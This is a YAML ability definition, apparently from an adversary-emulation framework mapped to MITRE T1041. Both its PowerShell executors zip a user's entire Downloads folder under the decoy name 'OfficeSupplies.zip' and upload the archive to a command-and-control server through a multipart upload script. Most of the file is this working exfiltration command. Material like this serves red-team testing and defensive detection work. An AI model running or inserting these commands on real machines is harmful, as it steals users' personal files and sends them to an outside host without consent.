ability_id: a612311d-a802-48da-bb7f-88a4b9dd7a24
access: {}
additional_info: {}
buckets:
- exfiltration
delete_payload: true
description: Compress all data within Download directory and exfiltrate the results.
executors:
- additional_info: {}
  build_target: null
  cleanup: []
  code: null
  command: "Write-Host \"[*] Compressing all the things in download dir\";\nCompress-Archive\
    \ -Path \"C:\\Users\\#{profile_user}\\Downloads\\*.*\" -DestinationPath \"$env:APPDATA\\\
    OfficeSupplies.zip\";\n\nImport-Module .\\upload.ps1 -Verbose -Force;\nInvoke-MultipartFormDataUpload\
    \ -InFile \"$env:APPDATA\\OfficeSupplies.zip\" -Uri \"#{server}/file/upload\"\
    ;\nif ($?) {\n  write-host \"[+] Data exfil of download directory completed!\"\
    ;\n} else {\n  write-host \"[!] Data exfil failed!\";\n}"
  language: null
  name: psh
  parsers: []
  payloads:
  - upload.ps1
  platform: windows
  timeout: 60
  uploads: []
  variations: []
- additional_info: {}
  build_target: null
  cleanup: []
  code: null
  command: "Write-Host \"[*] Compressing all the things in download dir\";\nCompress-Archive\
    \ -Path \"C:\\Users\\#{profile_user}\\Downloads\\*.*\" -DestinationPath \"$env:APPDATA\\\
    OfficeSupplies.zip\";\n\nImport-Module .\\upload.ps1 -Verbose -Force;\nInvoke-MultipartFormDataUpload\
    \ -InFile \"$env:APPDATA\\OfficeSupplies.zip\" -Uri \"#{server}/file/upload\"\
    ;\nif ($?) {\n  write-host \"[+] Data exfil of download directory completed!\"\
    ;\n} else {\n  write-host \"[!] Data exfil failed!\";\n}"
  language: null
  name: pwsh
  parsers: []
  payloads:
  - upload.ps1
  platform: windows
  timeout: 60
  uploads: []
  variations: []
name: Data from staged file (T1074) and Exfiltration over C2 Channel (T1041)
plugin: emu
privilege: ''
repeatable: false
requirements: []
singleton: false
tactic: exfiltration
technique_id: T1041
technique_name: Exfiltration Over C2 Channel
